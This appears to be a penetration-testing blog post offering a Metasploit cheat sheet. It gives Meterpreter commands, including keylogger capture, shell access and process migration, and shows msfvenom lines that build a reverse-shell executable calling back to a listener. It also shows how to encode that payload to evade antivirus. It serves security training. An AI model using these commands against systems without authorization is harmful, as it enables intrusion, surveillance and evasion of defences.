Metasploit cheat sheet – Metasploit is an excellent pen-testing tool. We can use this in various transactions. We have discussed this before in numerous Metasploit hacking-related posts.
In this post, we will also look at the shutdown type command in Metasploit.
Metasploit cheat sheet
Networking commands
ipconfig: Show network interface configuration
portfwd: Forward packets
route: View/edit network routing table
Process handling commands
getpid: Display the process ID
getuid: Display the user ID
ps: Display running process
Kill: Stop and terminate a process
getprivs: Shows multiple privileges as possible
reg: Access target machine registry
Shell: Access target machine shell
execute: Run a specified
migrate: Move to a given destination process ID
Interface / output commands
enumdesktops – Show all available desktops
Getdesktop – Display current desktop
keyscan_ start – Start keylogger in the target machine
Keyscan_ stop – Stop keylogger in the target machine
set _desktop – Configure desktop
keyscan_dump – Dump keylogger content
Metasploit cheat sheet
Search for module: search [regex]
Specify and exploit to use: use exploit/[ExploitPath]
Specify a Payload to use: set PAYLOAD [PayloadPath]
Show options for the current modules: show options
Set options: set [Option] [Value]
Start exploit: exploit
Useful Auxiliary Modules
#Port Scanner:msf > use auxiliary/scanner/portscan/tcpmsf > set RHOSTS 10.10.10.0/24msf > run#DNS Enumeration:msf > use auxiliary/gather/dns_enummsf > set DOMAIN target.tgtmsf > run#FTP Server:msf > use auxiliary/server/ftpmsf > set FTPROOT /tmp/ftprootmsf > run#Proxy Server:msf > use auxiliary/server/socks4msf > run msfvenom commands
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with ‘’-l payloads’ to get a list of payloads.
msfvenom –p [PayloadPath] –f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort] Example :
Reverse Meterpreter payload as an executable and redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe Format Options (specified with –f) –help-formats – List available output formats
exe – Executable pl – Perl rb – Ruby raw – Raw shellcode c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders’ to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeInterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort] Example:
Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe Meterpreter commands
? / help: Display a summary of commands exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
cd: Change directory
lcd: Change directory on local (attacker’s) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
getpid: Display the process ID that Meterpreter is running inside.
getuid: Display the user ID that Meterpreter is running with.
ps: Display process list.
kill: Terminate a process given its process ID.
execute: Run a given program with the privileges of the process the Meterpreter is loaded in.
migrate: Jump to a given destination process ID
Managing sessions
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit –j
List all current jobs (usually exploit listeners):
msf > jobs –l
Kill a job:
msf > jobs –k [JobID]
That’s it. I hope this post was helpful to you. If you have any doubts you can ask me through the command section.
Post a Comment